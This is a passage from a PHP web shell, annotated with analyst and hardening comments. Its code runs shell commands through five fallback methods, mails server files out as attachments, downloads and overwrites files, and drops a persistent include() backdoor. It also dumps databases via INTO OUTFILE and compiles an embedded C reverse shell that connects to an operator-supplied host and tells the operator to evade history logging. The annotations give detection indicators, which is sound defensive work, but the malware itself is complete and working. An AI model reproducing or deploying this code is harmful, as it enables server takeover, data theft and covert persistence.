		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp." name=".$dbn." table=".$dbt .
		"</td></tr><tr><td> " .
		Odisplay_rows($OdbH, $dbu, $dbp, $dbn, $dbt);
	} else {
		$strOutput .= "host=".$dbH." user=".$dbu." pass=".$dbp .
		"</td></tr><tr><td> " .
		Odisplay_tables($OdbH, $dbu, $dbp);
	}
	$strOutput .= "</pre></td></tr></table><br/>";
}


# Final delivery. The whole UI collected in $strOutput is base64-encoded and
# sent as the src of a full-page iframe using a data:text/html URI.
# Analyst note: the panel's HTML therefore never appears in clear text in the
# HTTP response; response-side signatures should key on the iframe wrapper
# (src="data:text/html;base64,...) or decode the payload before matching.
# The run of closing div tags closes elements of whatever markup surrounds
# the output - presumably the page the script is included in; confirm.
$strOutput .= "</font></td></tr></table>";
$strOutputB64 = chunk_split(base64_encode($strOutput));
echo "</div></div></div></div></div></div></div></div></div></div>\n";
echo '<iframe width="100%" height="100%" style="border:0; position: absolute; left: 0px; top: 0px;" src="data:text/html;base64,' . $strOutputB64 .'">';

######################################################################
#
# functions
#
######################################################################
# make globals avail
# Recreates register_globals behaviour so that every GET/POST/cookie value
# becomes a global variable, and copies a few server values into globals.
# This is what makes all feature flags and form fields in this script
# request-controlled.
# Analyst note: import_request_variables() was removed in PHP 5.4, so as far
# as the visible code shows this sample depends on a legacy PHP runtime.
function import_globals()  
{
	global $HTTP_SERVER_VARS;
	global $REMOTE_ADDR;  
	global $PHP_SELF;
	global $REQUESTS;
	global $SCRIPT_FILENAME;
	global $QUERY_STRING;
	global $SCRIPT_URI;
	global $SERVER_NAME;
	$_igr = ini_get('register_globals');
	# 'GPC' = import GET, POST and cookie variables, with no name prefix.
	if ($_igr == '' OR $_igr == 'Off' OR $_igr == 0) import_request_variables('GPC');
	# String comparison of version numbers. $HTTP_GET_VARS/$HTTP_POST_VARS are
	# not declared global in this function.
	if (phpversion() <= '4.1.0') {
		$REQUESTS = array_merge($HTTP_GET_VARS, $HTTP_POST_VARS); 
	} else {
		$REQUESTS = $_REQUEST;
	}
	# Falls back to the old $HTTP_SERVER_VARS array when $_SERVER is empty.
	if($_SERVER['PHP_SELF']=="") {
		$SERVER_NAME     = $HTTP_SERVER_VARS['SERVER_NAME'];
		$SCRIPT_URI      = $HTTP_SERVER_VARS['SCRIPT_URI'];
		$REMOTE_ADDR     = $HTTP_SERVER_VARS['REMOTE_ADDR'];
		$QUERY_STRING    = $HTTP_SERVER_VARS['QUERY_STRING'];
		$PHP_SELF        = $HTTP_SERVER_VARS['PHP_SELF'];
		$SCRIPT_FILENAME = $HTTP_SERVER_VARS['SCRIPT_FILENAME'];
	} else {
		$SERVER_NAME     = $_SERVER['SERVER_NAME'];
		$SCRIPT_URI      = $_SERVER['SCRIPT_URI'];
		$REMOTE_ADDR     = $_SERVER['REMOTE_ADDR'];
		$QUERY_STRING    = $_SERVER['QUERY_STRING'];
		$PHP_SELF        = $_SERVER['PHP_SELF'];
		$SCRIPT_FILENAME = $_SERVER['SCRIPT_FILENAME'];
	}
}

# Debug dump: prints the key/value pairs of the variable whose NAME is passed
# in $v, recursing into arrays and skipping keys found in $DebugArr and the
# GLOBALS entry. The loop is assembled as a string and run through eval(), so
# $v ends up inside evaluated source. $rv is assigned but not used; output is
# echoed directly.
function dd($v) {
	global $DebugArr;
	$rv = "<blockquote>\n";
	$q="while(list(\$key,\$val) = each(\$$v)) {".
	' if(array_search($key, $DebugArr)) {'.
	' } else if((is_array($val)) && ($key!="GLOBALS")) {'.
	'  echo "<b>$key</b>>><br/>";'.
	'  @dd($v."[".$key."]");'.
	' } else if($key=="GLOBALS") {'.
	' } else echo "<b>$key</b>=>$val<br/>";'.
	'};';
	eval($q);
	echo "</blockquote>\n";
}

# Variant of dd() without the $DebugArr filter. The dump loop is again built
# as a string and evaluated; nested arrays are handed to dd(), not ddb().
function ddb($v) {
	echo "<blockquote>\n";
	$q="while(list(\$key,\$val) = each(\$$v)) {".
	' if((is_array($val)) && ($key!="GLOBALS")) {'.
	'  echo "<b>$key</b>>><br/>";'.
	'  @dd($v."[".$key."]");'.
	' } else if($key=="GLOBALS") {'.
	' } else echo "<b>$key</b>=>$val<br/>";'.
	'};';
	eval($q);
	echo "</blockquote>\n";
}

######################################################################
# cmd shell functions
######################################################################
# test what cmd is working
# Probes which execution method of Mexec() works by running "pwd" through each
# one, highest number first, and returns that method number (0 = none).
# Methods 5, 4 and 3 wrap their output in <pre></pre>, which is 11 characters,
# so more than 11 means the command produced output; methods 2 and 1 only need
# a non-empty return value.
# Analyst note: a web server worker spawning "pwd" is a cheap process-creation
# indicator for this probe.
function test_cmd_shell(){
	if(strlen(Mexec("pwd", 5))>11)     $var = 5;
	elseif(strlen(Mexec("pwd", 4))>11) $var = 4;
	elseif(strlen(Mexec("pwd", 3))>11) $var = 3;
	elseif(strlen(Mexec("pwd", 2))>0) $var = 2;
	elseif(strlen(Mexec("pwd", 1))>0) $var = 1;
	else $var = 0;
	return $var;
}
# function for executing cmds
# Runs $Mcmd through one of five PHP command-execution primitives selected by
# $type: 5 exec(), 4 proc_open(), 3 backticks, 2 system(), 1 passthru().
# Returns the collected output (wrapped in <pre> for 5/4/3), or nothing at all
# when $Mcmd is empty. $Mcmd is passed to the shell unmodified.
# Hardening note: because the script falls back across all five primitives,
# disable_functions has to cover exec, proc_open, shell_exec (which also
# disables the backtick operator), system and passthru together to block it.
function Mexec($Mcmd, $type) {
	if($Mcmd != ""){
		# Pipe layout used only by the proc_open() branch.
		$dspec = array(
			0 => array("pipe", "r"),
			1 => array("pipe", "w"),
			2 => array("pipe", "r")
		);
		$output = "";
		switch($type) {
			case 5:
				$output .= "<pre>";
				$lastline = exec($Mcmd, $arrOutput);
				foreach($arrOutput as $val) {
					$output .= $val . "\n";
				}
				$output .= "</pre>";
				break;
			case 4:
				$proc = proc_open($Mcmd, $dspec, $pipes);
				if (is_resource($proc)) {
					$output .= "<pre>";
					# stdin is closed at once; only stdout is read. Neither the
					# remaining pipes nor the process handle are closed here.
					fclose($pipes[0]);
					while(!feof($pipes[1])) {
						$tmp = fgets($pipes[1], 1024);
						$output .= $tmp;
					}
					$output .= "</pre>";
				}
				break;
			case 3;
				$output .= "<pre>";
				$output .= `$Mcmd`;
				$output .= "</pre>";
				break;
			case 2;
				# system()/passthru() write the command output straight to the
				# response; $output only receives their return value.
				print "<pre>\n";
				$output = system($Mcmd);
				print "</pre>\n";
				break;
			case 1;
				print "<pre>\n";
				$output = passthru($Mcmd);
				print "</pre>\n";
				break;
			case 0;
			default;
				$output = "There are no execute functions available!";
				break;
		}
		return $output;
	}	
}
# Sends a mail with one attachment. The attachment is read with fopen() from
# $attach_source, and the complete MIME body (text part plus base64
# attachment) is assembled inside the additional-headers argument of mail();
# the message argument itself is empty.
# $from, $content_type and $attach_appear are placed into header lines without
# any filtering. Returns a status string; on success that string contains the
# full header block. The file handle is never closed.
# Analyst note: this lets the operator mail out any file the web server can
# read - outbound mail from the web host with base64 attachments is the
# thing to look for.
function drop_mime_mail($from,$to,$subject,$attach_source,$content_type,$attach_appear,$msg) {
	$msgerror = "";
	if($msg == "") $msgerror = "please enter a message";
	elseif($subject == "") $msgerror = "please enter a subject";
	else {
		# MIME boundary string.
		$stlf = md5(uniqid(time())); 
		$attach = "";
		$fp = fopen($attach_source, "rb"); 
		if($fp) while(!feof($fp)) { $attach = $attach . fread($fp, 1024); } 
		$header = "From: $from\n"; 
		$header .= "MIME-Version: 1.0\n"; 
		$header .= "Content-Type: multipart/mixed; boundary=$stlf\n\n"; 
		$header .= "This is a multi-part message in MIME format\n"; 
		$header .= "--$stlf\n"; 
		$header .= "Content-Type: text/plain\n"; 
		$header .= "Content-Transfer-Encoding: 8bit\n\n"; 
		$header .= "$msg\n"; 
		$header .= "--$stlf\n"; 
		$header .= "Content-Type: $content_type; name=$attach_appear\n"; 
		$header .= "Content-Transfer-Encoding: base64\n"; 
		$header .= "Content-Disposition: attachment; filename=$attach_appear\n\n"; 
		$header .= chunk_split(base64_encode($attach)); 
		$header .= "\n"; 
		$header .= "--$stlf--"; 
		# The return value of mail() is not checked.
		mail($to,$subject,"",$header); 
		$msgerror = "send done - show header: <br>\n<pre>$header</pre> ";
	} 
	return $msgerror;
}

######################################################################
# system browsing
######################################################################

# Builds one navigation toggle for the feature named $val: the label is green
# with an "off" link when the request currently has $val == 1, otherwise black
# with an "on" link. The link re-requests the script with $val set to the
# opposite value.
# Analyst note: because features are switched with links, the feature names
# end up as GET parameters with value 0/1 (name=1 style) in access logs.
function make_switch($val){
	global $txt;
	global $lang;
	global $SCRIPT_NAME,$SREQ,$_REQUEST,$MyLoc,$_SERVER;
	if(isset($_REQUEST[$val]) AND $_REQUEST[$val] == 1) { $test = 0; $col = "green"; $sw = $txt[$lang]['off']; }
	else { $test = 1; $col = "black"; $sw = $txt[$lang]['on']; }
	return " <font color=$col>$val</font> <a target=\"_parent\" href=\"".$MyLoc."?".$SREQ."&".$val."=".$test."\">[ ". $sw." ]</a> ";
}
# No-op in this sample: the only statement that would write to syslog is
# commented out, so $msg is never logged.
function drop_syslog_warning($msg) {
	global $syslog;
#	if($syslog == 1) syslog(LOG_WARNING,$msg);
}

######################################################################
# file functions
######################################################################
# Copies $source to $dest with copy(). The function sets PHP's user_agent
# option first, which only matters when $source is a URL, so this is the
# sample's download-to-disk routine.
# Analyst note: the user agent string "m0ins downloader" is set verbatim and is
# a usable indicator in proxy or egress HTTP logs.
# The function has no return statement, and the "failed to copy" expression
# is a bare concatenation whose result is discarded, so callers get nothing.
function copy_file($source,$dest) {
	$dataout = "";
	if($source == "")  $dataout .= "enter source<br>\n";
	if($dest != "") {
		ini_set("user_agent","m0ins downloader");
		if(!copy($source, $dest)) $dataout . "failed to copy ...<br>\n";
		if(file_exists($dest)) $dataout .= highlight_file($dest, 1);
	} else {
		$dataout .= "enter destination";
	}
}
# Shows an existing file and, when $do == 1, first overwrites it with $cont.
# Only files that already exist are touched (file_exists() gate); the file is
# opened in "w" mode, so its previous content is truncated. Returns the
# highlighted file content or an error string.
# Analyst note: unexpected mtime changes on files writable by the web server
# account are the on-disk trace of this routine.
function edit_file($cont,$dest,$do) {
	$dataout = "";
	global $magic_quotes_gpc;
	if(file_exists($dest)) {
		if($do == 1){
			$fh = fopen($dest, "w");		
			if(!$fh) {
				$dataout .= "unable to open <b>$dest</b>.\n";
			} else {
#				$cont = str_replace("&gt;", ">", str_replace("&lt;", "<", $cont));
				# Undo the backslashes magic_quotes_gpc added to request data.
				if($magic_quotes_gpc == 1) $cont = stripslashes($cont);
				$write = fwrite($fh, $cont);
				fclose($fh);
			}
		}
		$dataout .= highlight_file($dest, 1);
	} else {
		$dataout .= "unable to open <b>$dest</b>.\n";
	}
	return $dataout;
}
# Returns the content of $source with "<" and ">" replaced by HTML entities,
# or an error string when the file is missing or cannot be opened. Other
# characters (such as "&" and quotes) are not escaped.
function show_file($source) {
	$dataout = "";
	if(file_exists($source)) {
		$fh = fopen($source, "r");
		if(!$fh) {
			$dataout .= "unable to open <b>$source</b>.\n";
		} else {
			$read = fread($fh, filesize($source));
			fclose($fh);
			if(!empty($read)) $read = str_replace(">", "&gt;", str_replace("<", "&lt;", $read));
			$dataout .= $read;
		}
	} else {
		$dataout .= "unable to open <b>$source</b>.\n";
	}
	return $dataout;
}
# Lists directory $chdir and returns an HTML table with four columns: files,
# directories, writable directories, writable files. The four lists are kept
# in global arrays.
# The two "writable" tests call is_dir()/is_file() on the bare file name, not
# on the full path $FN, so they are evaluated relative to the current working
# directory. closedir() is also called when opendir() failed.
function snoopy($chdir){
	$tmpOut = "";
	global $is_file,$is_dir,$is_w_dir,$is_w_file;
	$fh = opendir("$chdir");
	if($fh!="") {
		while (false !== ($filename = readdir($fh)) ) {
			$FN = $chdir."/".$filename;
			if(@is_file($FN)) $is_file[] = $filename;
			if(@is_dir($FN))  $is_dir[] = $filename;
			if(@is_writable($FN) && @is_dir($filename))  $is_w_dir[] = $filename;
			if(@is_writable($FN) && @is_file($filename)) $is_w_file[] = $filename;
		}
		$tmpOut .=  "<table border=1 cellspacing=1 cellpadding=0><tr>";
		$tmpOut .= echo_files($is_file,  "all files");
		$tmpOut .= echo_files($is_dir,   "only dirs");
		$tmpOut .= echo_files($is_w_dir, "writable dirs");
		$tmpOut .= echo_files($is_w_file,"writable files");
		$tmpOut .= "</tr></table>";
	} else {
		$tmpOut .= "Permission denied.";
	}
	closedir($fh);
	return $tmpOut;
}

# Renders one column of the directory listing: for each name in $arr it shows
# the numeric owner id, the last three octal permission digits and a link.
# Directory links set chdir; file links set vsource and switch snoop off.
# Colours: red = writable, green = other file, blue = other directory.
# File names and paths go into the HTML and the URLs without escaping.
# Analyst note: browsing with this panel produces GET requests carrying
# chdir= and vsource= parameters with absolute paths.
function echo_files($arr,$txt){
	$tmpOutMF = "";
	global $chdir,$MyLoc,$SREQ;
	$tmpOutMF .= "<td valign=top>";
	$tmpOutMF .= "<b><font size=2 face=arial>$txt</b> <br><br>";
	if(count($arr) > 0) {
		foreach($arr as $key => $file) {
			$FN = $chdir."/".$file;
			$owner = fileowner($FN);
			$perms = substr(sprintf("%o",fileperms($FN)),-3);
			if(@is_writable($FN) && @is_dir($FN))  $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
			elseif(@is_writable($FN) && @is_file($FN)) $tmpOutMF .=  "<font color=red>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a> </font><br>";
			elseif(@is_file($FN)) $tmpOutMF .=  "<font color=green>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&snoop=0&vsource=$FN'>$file</a></font><br>"; 
			elseif(@is_dir($FN))  $tmpOutMF .=  "<font color=blue>$owner - $perms - <a target='_parent' href='$MyLoc?$SREQ&chdir=$FN'>$file</a></font><br>";
		}
	}
    $tmpOutMF .=  "</td>";
    return $tmpOutMF;
}
# Prints every key/value pair of the variable whose NAME is in $v and recurses
# into nested arrays (except GLOBALS). As in dd(), the loop is built as a
# string and executed with eval(), so $v becomes part of evaluated source.
function print_globals($v) {
	global $a;
	echo "<blockquote>\n";
	$q= "while(list(\$key,\$val) = each($".$v. ") ) { ".
	" echo \"<b>\$key</b>=>\$val.<br>\"; ".
	" if(( is_array(\$val)) && (\$key != \"GLOBALS\")) {".
	" @print_globals( \$v.\"[\".\$key.\"]\" );".
	"}}";
	eval($q);
	echo "</blockquote>\n";
}
######################################################################
# connect back shell function
######################################################################

# Writes an embedded C program to <tmp_dir>/cbs.c, compiles it with $compiler
# into <tmp_dir>/cbs, then runs the binary with $host and $port as arguments.
# Returns the combined compiler/program output, or an error string when the
# source could not be written or no execution method is available.
# All four arguments are concatenated into file paths and command lines
# without escaping.
# Analyst notes (all taken from the code below):
#  - on disk: files named cbs.c and cbs in the chosen temp directory;
#  - process tree: the web server account launching a compiler, then ./cbs;
#  - strings in source and binary: "Data Cha0s Connect Back Backdoor" and
#    "Welcome to Data Cha0s Connect Back Shell";
#  - the banner tells the operator to unset HISTFILE/SAVEHIST, so missing
#    shell history on an affected host is expected rather than reassuring;
#  - the program connects out to host:port and execs /bin/sh with its
#    stdin/stdout/stderr on that socket, so egress filtering from web hosts
#    is the network-level control.
function connect_back($tmp_dir, $compiler, $host, $port) {
    $shell = "#include <stdio.h>\n" .
             "#include <sys/socket.h>\n" .
             "#include <netinet/in.h>\n" .
             "#include <arpa/inet.h>\n" .
             "#include <netdb.h>\n" .
             "int main(int argc, char **argv) {\n" .
             "  char *host;\n" .
             "  int port = 80;\n" .
             "  int f;\n" .
             "  int l;\n" .
             "  int sock;\n" .
             "  struct in_addr ia;\n" .
             "  struct sockaddr_in sin, from;\n" .
             "  struct hostent *he;\n" .
             "  char msg[ ] = \"Welcome to Data Cha0s Connect Back Shell\\n\\n\"\n" .
             "                \"Issue \\\"export TERM=xterm; exec bash -i\\\"\\n\"\n" .
             "                \"For More Reliable Shell.\\n\"\n" .
             "                \"Issue \\\"unset HISTFILE; unset SAVEHIST\\\"\\n\"\n" .
             "                \"For Not Getting Logged.\\n(;\\n\\n\";\n" .
             "  printf(\"Data Cha0s Connect Back Backdoor\\n\\n\");\n" .
             "  if (argc < 2 || argc > 3) {\n" .
             "    printf(\"Usage: %s [Host] <port>\\n\", argv[0]);\n" .
             "    return 1;\n" .
             "  }\n" .
             "  printf(\"[*] Dumping Arguments\\n\");\n" .
             "  l = strlen(argv[1]);\n" .
             "  if (l <= 0) {\n" .
             "    printf(\"[-] Invalid Host Name\\n\");\n" .
             "    return 1;\n" .
             "  }\n" .
             "  if (!(host = (char *) malloc(l))) {\n" .
             "    printf(\"[-] Unable to Allocate Memory\\n\");\n" .
             "    return 1;\n" .
             "  }\n" .
             "  strncpy(host, argv[1], l);\n" .
             "  if (argc == 3) {\n" .
             "    port = atoi(argv[2]);\n" .
             "    if (port <= 0 || port > 65535) {\n" .
             "      printf(\"[-] Invalid Port Number\\n\");\n" .
             "      return 1;\n" .
             "    }\n" .
             "  }\n" .
             "  printf(\"[*] Resolving Host Name\\n\");\n" .
             "  he = gethostbyname(host);\n" .
             "  if (he) {\n" .
             "    memcpy(&ia.s_addr, he->h_addr, 4);\n" .
             "  } else if ((ia.s_addr = inet_addr(host)) == INADDR_ANY) {\n" .
             "    printf(\"[-] Unable to Resolve: %s\\n\", host);\n" .
             "    return 1;\n" .
             "  }\n" .
             "  sin.sin_family = PF_INET;\n" .
             "  sin.sin_addr.s_addr = ia.s_addr;\n" .
             "  sin.sin_port = htons(port);\n" .
             "  printf(\"[*] Connecting...\\n\");\n" .
             "  if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1) {\n" .
             "    printf(\"[-] Socket Error\\n\");\n" .
             "    return 1;\n" .
             "  }\n" .
             "  if (connect(sock, (struct sockaddr *)&sin, sizeof(sin)) != 0) {\n" .
             "    printf(\"[-] Unable to Connect\\n\");\n" .
             "    return 1;\n" .
             "  }\n" .
             "  printf(\"[*] Spawning Shell\\n\");\n" .
             "  f = fork( );\n" .
             "  if (f < 0) {\n" .
             "    printf(\"[-] Unable to Fork\\n\");\n" .
             "    return 1;\n" .
             "  } else if (!f) {\n" .
             "    write(sock, msg, sizeof(msg));\n" .
             "    dup2(sock, 0);\n" .
             "    dup2(sock, 1);\n" .
             "    dup2(sock, 2);\n" .
             "    execl(\"/bin/sh\", \"shell\", NULL);\n" .
             "    close(sock);\n" .
             "    return 0;\n" .
             "  }\n" .
             "  printf(\"[*] Detached\\n\\n\");\n" .
             "  return 0;\n" .
             "}\n";
    # Fixed base name "cbs" inside the caller-supplied directory.
    $fbname = $tmp_dir . "/cbs";
	$fp = fopen($fbname . ".c", "w");
	$write = fwrite($fp, $shell);
	fclose($fp);
	if(!empty($write)) {
		# Step 1: compile. Step 2: run the result. Both go through Mexec() using
		# whichever execution method test_cmd_shell() found.
		$command = $compiler . " -o " . $fbname . " " . $fbname . ".c";
		$execM = test_cmd_shell();
		if($execM > 0) {
			$rtval = Mexec($command, $execM);
			$command = $fbname . " " . $host . " " . $port;
			$rtval .= Mexec($command, $execM);
			return "<pre>" . $rtval . "</pre>";
		} else {
			return "<b>ERROR! No EXEC Avilable!</b>";
		}
		
	} else {
		return "<b>ERROR! Writing data!</b>";
	}
}

######################################################################
# drop mini inc hole
######################################################################
# Writes a second-stage PHP file to $location. The dropped file takes the
# request parameter "inc" and passes it straight to include(), i.e. it is a
# minimal file-inclusion backdoor that survives removal of this script.
# Returns a status string; the file handle is not closed.
# Analyst note: when cleaning up, search the web root for small PHP files
# containing the statement include($vars[inc]); - deleting only the main
# shell leaves those in place.
function dropminiinc($location) {
	$Scode = "<?php\n".
		"if (phpversion() <= '4.1.0') \$vars = array_merge(\$HTTP_GET_VARS, \$HTTP_POST_VARS);\n".
		"else \$vars = \$_REQUEST;\n".
		"include(\$vars[inc]);\n".
		"?>\n";
	$fp = fopen($location, "w");
	$write = fwrite($fp, $Scode);
	if(!empty($write)) return "<b>$location</b> copied\n";
	else return "<b>ERROR! Not copied!</b>";
}

######################################################################
# db functions
# unchanged from dans code
######################################################################
# Turns a mysql_* result set into an HTML table: one header row with the field
# names, then one row per record. Cell values are inserted without HTML
# escaping. Uses the legacy mysql extension, which was removed in PHP 7.
function prep_rows($myresult) {
	$dataout = "<table>\n";
	$num_fields = mysql_num_fields($myresult);
	$dataout .= "<tr border=1>\n";
	for($i=0; $i<$num_fields; $i++) $dataout .= "<td>" . mysql_field_name($myresult, $i) . "</td>";
	$dataout .= "</tr>\n";
	while ($line = mysql_fetch_array($myresult, MYSQL_ASSOC)) {
		$dataout .= "<tr>\n";
		foreach($line as $colvalue) {
			$dataout .= "<td>$colvalue</td>\n";
		}
	$dataout .= "</tr>\n";
	}
	$dataout .= "</table>\n";
	return $dataout;
}

# Exports a whole table with SELECT ... INTO OUTFILE. The statement is built by
# string concatenation from $mytable and $mydump, and no call result is
# checked: the function returns "Hopefully dumped!" whatever happened.
# INTO OUTFILE makes the MySQL server itself write the file on the database
# host. Hardening note: it requires the FILE privilege and is confined by
# secure_file_priv where that is set, so application accounts should not hold
# FILE.
function dump_rows($myhost, $myuser, $mypass, $mydb, $mytable, $mydump) {
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	mysql_select_db($mydb); //  or return "Could not select database";
	$query = "SELECT * FROM ".$mytable." INTO OUTFILE \"".$mydump."\";";
	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
	mysql_free_result($result);
	mysql_close($link);
	return "Hopefully dumped!";
}

# Like dump_rows(), but for an arbitrary statement: appends INTO OUTFILE
# "<mydump>" to the caller-supplied SQL text and runs it. Nothing is validated
# or checked; the return value is always "Hopefully dumped!".
# The same FILE privilege / secure_file_priv limits apply on the MySQL side.
function dump_query($myhost, $myuser, $mypass, $mydb, $mysql, $mydump) {
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	mysql_select_db($mydb); //  or return "Could not select database";
	$query = $mysql." INTO OUTFILE \"".$mydump."\";";
	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
	mysql_free_result($result);
	mysql_close($link);
	return "Hopefully dumped!";
}

# Runs the caller-supplied SQL text unchanged and returns the result as an HTML
# table via prep_rows(). Connection, database selection and query results are
# not checked before use.
function display_query($myhost, $myuser, $mypass, $mydb, $mysql) {
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	mysql_select_db($mydb); //  or return "Could not select database";
	$query = $mysql;
	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
	$dataouted = prep_rows($result);
	mysql_free_result($result);
	mysql_close($link);
	return($dataouted);
}

# Returns every row of $mytable as an HTML table. The table name is
# concatenated into the SELECT statement; no call result is checked.
function display_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	mysql_select_db($mydb); //  or return "Could not select database";
	$query = "SELECT * FROM ".$mytable;
	$result = mysql_query($query); // or return "Query failed: ".mysql_error();
	$dataouted = prep_rows($result);
	mysql_free_result($result);
	mysql_close($link);
	return($dataouted);
}

# Lists the tables of database $mydb as an HTML table of links; each link
# re-requests the script with the connection settings and the table name.
# Analyst note: the links carry incdbhost, incdbuser and incdbpass in the query
# string, so database credentials used through this panel can be recovered
# from the web server's access log when a link was followed.
# On the early "DB Error" return the connection is left open.
function display_tables($myhost, $myuser, $mypass, $mydb) {
	global $MyLoc,$SREQ;
	$link = mysql_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	$result = mysql_list_tables($mydb);
	if (!$result) {
		return "DB Error, could not list tables";
	}
	$dataout = "<table>\n";
	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
		$dataout .= "<tr>\n";
		foreach ($line as $col_value) {
			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$mydb&incdbtable=$col_value'>$col_value</a></td>\n";
		}
	$dataout .= "</tr>\n";
	}
	$dataout .= "</table>\n";
	mysql_free_result($result);
	mysql_close($link);
	return($dataout);
}

# Lists the databases visible to the given account as an HTML table of links;
# each link re-requests the script with the connection settings and the
# database name.
# Analyst note: as in display_tables(), the links put incdbuser and incdbpass
# into the query string, which leaves the credentials in access logs.
function display_dbs($myhost, $myuser, $mypass) {
	global $MyLoc,$SREQ;
	$link = mysql_connect($myhost, $myuser, $mypass);
	$result = mysql_list_dbs($link);
	if (!$result) {
		return "DB Error, could not list databases";
	}
	$dataout = "<table>\n";
	while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
		$dataout .= "<tr>\n";
		foreach ($line as $col_value) {
			$dataout .= "<td><a href='$MyLoc?$SREQ&incdbhost=$myhost&incdbuser=$myuser&incdbpass=$mypass&incdbname=$col_value'>$col_value</a></td>\n";
		}
	$dataout .= "</tr>\n";
	}
	$dataout .= "</table>\n";
	mysql_free_result($result);
	mysql_close($link);
	return($dataout);
}

# ODBC counterpart of display_rows(): selects all rows of $mytable over an ODBC
# connection and returns an HTML table. $mydb is accepted but not used.
# NOTE(review): the loop passes the MySQL constant MYSQL_ASSOC to
# odbc_fetch_row() and iterates over its return value as if it were a row
# array - this looks like an incomplete port of the MySQL code; confirm
# whether it produces any rows in practice.
function Odisplay_rows($myhost, $myuser, $mypass, $mydb, $mytable) {
	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	$query = "SELECT * FROM ".$mytable;
	$result = odbc_exec($link, $query); // or return "Query failed: ".mysql_error();
	$dataout = "<table>\n";
	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
		$dataout = $dataout . "<tr>\n";
		foreach($line as $colvalue) {
			$dataout = $dataout . "<td>$colvalue</td>\n";
		}
	$dataout = $dataout . "</tr>\n";
	}
	$dataout = $dataout . "</table>\n";
	return($dataout);
}

# ODBC counterpart of display_tables(): asks the data source for its table list
# and returns an HTML table of the entries whose fourth column is "TABLE".
# NOTE(review): odbc_result() is called on $line and on $tablelist, and
# $tablelist is never assigned in this function - like Odisplay_rows() this
# looks unfinished; confirm before relying on its output during analysis.
function Odisplay_tables($myhost, $myuser, $mypass) {
	$link = odbc_connect($myhost, $myuser, $mypass); // or return "Could not connect";
	$result = odbc_tables($link);
	if (!$result) {
		return "DB Error, could not list tables";
	}
	$dataout = "<table>\n";
	while ($line = odbc_fetch_row($result, MYSQL_ASSOC)) {
		if(odbc_result($line, 4) == "TABLE") {
			$dataout = $dataout . "<tr>\n";
			$dataout = $dataout . "<td>" . odbc_result($tablelist, 3) ."</td>\n"; 
		}
		$dataout = $dataout . "</tr>\n";
	}
	$dataout = $dataout . "</table>\n";
	return($dataout);
}

######################################################################
# Dan's Network function Wrappers
# Initial use inside this script, need to handle the error data 
# differently to get it included in the base 64 output!
######################################################################

# Maps a protocol name to the pair (protocol constant, socket type) used by the
# sockets extension: "udp" gives SOL_UDP/SOCK_DGRAM, anything else (including
# "tcp") gives SOL_TCP/SOCK_STREAM. Returns array($protocol, $socktype).
function DB_NET_GET_SOCKET_PROTOCOL($prot) {
	switch($prot) {
		case "udp":
			$protocol = SOL_UDP;
			$socktype = SOCK_DGRAM;
		break;
		case "tcp":
		default:
			$protocol = SOL_TCP;
			$socktype = SOCK_STREAM;
		break;
	}
	return(array($protocol, $socktype));
}

# Resolves $hostname, creates a socket of the requested protocol and connects
# it to $hostname:$port. Returns the socket whether or not the connect worked;
# failures are only echoed.
# The switch repeats what DB_NET_GET_SOCKET_PROTOCOL() already returned.
# NOTE(review): the error checks compare against "< 0"; presumably the socket
# functions signal failure with false on the targeted PHP versions, in which
# case these branches never fire - confirm.
function DB_NET_CONNECT($hostname, $port=80, $prot="tcp") {
	$address = gethostbyname($hostname);
	list($protocol, $socktype) = DB_NET_GET_SOCKET_PROTOCOL($prot);
	switch($prot) {
		case "udp":
			$protocol = SOL_UDP;
			$socktype = SOCK_DGRAM;
		break;
		case "tcp":
		default:
			$protocol = SOL_TCP;
			$socktype = SOCK_STREAM;
		break;
	}
	$socket = socket_create(AF_INET, $socktype, $protocol);
	if ($socket < 0) {
		echo "socket_create() failed: reason: " . socket_strerror($socket) . "\n";
	}

	$result = socket_connect($socket, $address, $port);
	if ($result < 0) {
		echo "socket_connect() failed.\nReason: ($result) " . socket_strerror($result) . "\n";
	}
	return $socket;
}

# Creates a TCP socket, binds it to $address:$port and starts listening with a
# backlog of 5. Returns the listening socket, or -1/-2/-3 for a failure in
# create/bind/listen (each failure is also echoed).
# Analyst note: a PHP or web server process holding a listening TCP socket on a
# port of its own is abnormal; host firewalls that only allow the published
# web ports inbound neutralise this path.
function DB_NET_LISTEN($address, $port) {
	if (($sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) < 0) {
		echo "socket_create() failed: reason: " . socket_strerror($sock) . "\n";
		return(-1);
	}

	if (($ret = socket_bind($sock, $address, $port)) < 0) {
		echo "socket_bind() failed: reason: " . socket_strerror($ret) . "\n";
		return(-2);
	}

	if (($ret = socket_listen($sock, 5)) < 0) {
		echo "socket_listen() failed: reason: " . socket_strerror($ret) . "\n";
		return(-3);
	}

	return($sock);
}

######################################################################
# Dan's PHP Connect Back / Port Binding Shell!
# Yes that right a REAL shell!
# Now I had this idea for ages, finally coded it 6 months ago, and 
# it's never really been used.
# Not really brain science but when there are many examples of PHP 
# sockets + proc_open it's a little harder.
######################################################################

# Attaches an interactive process to a TCP connection, entirely from PHP.
#  $type "cb": connect out to $host:$port (refused when $host is 0.0.0.0).
#  $type "pb": listen on $host:$port and accept one connection.
# $shell is then started with proc_open() and data is relayed between the
# socket and the process's stdin/stdout/stderr until either side fails.
